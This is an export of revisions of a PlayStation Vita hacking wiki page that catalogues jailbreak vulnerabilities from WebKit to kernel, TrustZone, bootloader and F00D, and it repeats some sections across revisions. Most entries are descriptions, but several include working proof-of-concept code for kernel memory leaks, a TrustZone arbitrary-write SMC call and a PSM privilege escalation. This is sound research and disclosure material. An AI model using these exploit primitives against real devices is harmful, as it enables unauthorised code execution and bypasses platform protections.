However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated with <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Now that the sum of code_size and offset_code is 0, this calculation would underflow to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11491Vulnerabilities2019-09-05T20:16:54Z<p>Xyz: /* Boot ROM */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When calling syscall, calling with invalid syscall id will end the svc interrupt without clearing vaddr in r0's syscall table.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) The development boot ROM does not check [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated with <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Now that the sum of code_size and offset_code is 0, this calculation would underflow to -0x40, or 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Molecule&diff=11490Molecule2019-09-05T14:26:57Z<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by Yifan Lu</p>
<hr />
<div>[[File:Molecule.png|frame|Team logo]] The Molecule team was the first to hack the Vita and responsible for the majority of the reversing work done on the Vita.<br />
<br />
== History ==<br />
<br />
=== F00D ===<br />
<br />
[[Secure Kernel]] was dumped 02/2017 (through octopus exploit) and [[Boot ROM]] was dumped on 08/2018 (through [[Glitching]]).<ref>https://teammolecule.github.io/35c3-slides/</ref><br />
<br />
=== Non Secure Kernel Bootloader - enso ===<br />
<br />
The commonly spread definition of CFW in PSP and PS3 scene was to be reboot-proof. Molecule achieved this on PSVita by exploiting a vulnerability in NSKBL eMMC init code.<br />
<br />
=== Plugins API - taiHEN ===<br />
<br />
Davee wanted a powerful API for patching PSVita OS, making it more a Custom FirmWare.<br />
<br />
[[https://yifan.lu/2016/11/01/taihen-cfw-framework-for-ps-vita/ Yifan's writeup]]<br />
<br />
